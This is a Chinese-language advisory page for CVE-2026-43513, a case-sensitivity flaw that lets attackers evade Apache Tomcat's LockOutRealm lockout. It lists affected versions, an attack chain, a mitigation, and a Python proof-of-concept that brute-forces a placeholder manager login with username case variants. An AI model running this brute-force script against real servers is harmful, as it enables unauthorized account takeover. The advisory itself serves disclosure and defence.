CVE-2026-43513 Apache Tomcat认证绕过漏洞

漏洞信息

漏洞编号

CVE-2026-43513

漏洞类型

认证绕过

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Apache Tomcat

漏洞概述

Apache Tomcat的LockOutRealm组件存在大小写敏感性处理不当漏洞。该漏洞源于未能对用户名进行标准化处理，导致账户锁定机制失效。攻击者可利用此逻辑缺陷，通过修改用户名大小写的方式绕过登录失败次数限制，从而对目标账户实施暴力破解攻击。此漏洞影响范围极广，覆盖7.0至11.0多个大版本，风险等级为高危，建议用户尽快升级至修复版本。

技术细节

Apache Tomcat的LockOutRealm功能旨在通过锁定多次登录失败的账户来防止暴力破解。然而，该组件在记录失败尝试时，直接使用了原始的用户名进行计数，而没有先进行大小写标准化（例如全部转为小写）。在许多系统中，用户认证通常是大小写不敏感的（即User和user是同一个账户）。攻击者利用这一差异，可以通过修改用户名的大小写（如Admin, admin, ADMIN）来发起多次登录请求。LockOutRealm将这些请求视为不同用户的失败尝试，从而不会触发账户锁定保护。这使得攻击者能够无限次地尝试密码，极大地增加了暴力破解成功的概率，导致账户被非法访问。此外，由于无需认证即可利用（PR:N），攻击者可以轻易地对系统发起持续的攻击尝试，最终获取系统的高机密性数据访问权限。

攻击链分析

STEP 1

侦察

攻击者确认目标系统使用的是存在漏洞的Apache Tomcat版本（7.0至11.0之间），并开启了LockOutRealm功能作为安全防护。

STEP 2

枚举变体

攻击者确定目标合法用户名（如admin），并生成该用户名的所有大小写排列组合（例如Admin, ADMIN, aDmin等）。

STEP 3

暴力破解

攻击者使用字典中的密码配合不同的用户名大小写变体，向登录接口发起大量的认证请求。

STEP 4

绕过锁定

由于LockOutRealm未对用户名进行标准化，它将“admin”和“Admin”视为不同用户，因此未达到单个账户的锁定阈值，锁定机制被绕过。

STEP 5

获取权限

攻击者最终尝试出正确的密码组合，成功登录系统，获取高机密性数据或进一步控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-43513: Apache Tomcat LockOutRealm Bypass
# This script demonstrates how an attacker can bypass account lockout
# by varying the case of the username.

import itertools
import requests

def generate_case_permutations(username):
    """Generate all possible case variations of a username."""
    return set([''.join(p) for p in itertools.product(*[c.lower()+c.upper() for c in username])])

def attempt_login(url, username, password):
    """Simulate a login request."""
    # Note: Actual endpoint and parameters depend on Tomcat configuration
    payload = {'j_username': username, 'j_password': password}
    try:
        response = requests.post(url, data=payload, timeout=5)
        return response.status_code == 200 and "Login Failed" not in response.text
    except requests.RequestException:
        return False

def main():
    target = "http://target-tomcat-manager:8080/manager/html"
    target_user = "admin"
    passwords = ["password", "123456", "admin", "tomcat"]
    
    print(f"[*] Starting brute force attack bypass for user: {target_user}")
    
    # Generate case variants (e.g., admin, Admin, ADMIN, aDmin, etc.)
    user_variants = generate_case_permutations(target_user)
    print(f"[*] Generated {len(user_variants)} username variants.")
    
    for pwd in passwords:
        for variant in user_variants:
            if attempt_login(target, variant, pwd):
                print(f"[+] SUCCESS! Logged in with username: '{variant}' and password: '{pwd}'")
                return
            else:
                print(f"[-] Failed with username: '{variant}' and password: '{pwd}'")
                
    print("[*] Attack completed.")

if __name__ == "__main__":
    main()

影响范围

Apache Tomcat 11.0.0-M1 through 11.0.21

Apache Tomcat 10.1.0-M1 through 10.1.54

Apache Tomcat 9.0.0.M1 through 9.0.117

Apache Tomcat 8.5.0 through 8.5.100

Apache Tomcat 7.0.0 through 7.0.109

防御指南

临时缓解措施

如果无法立即升级，建议在Web应用防火墙（WAF）或反向代理层面实施速率限制策略，检测针对同一用户不同大小写形式的高频请求，或者暂时禁用LockOutRealm并依赖应用层的更严格的认证安全机制。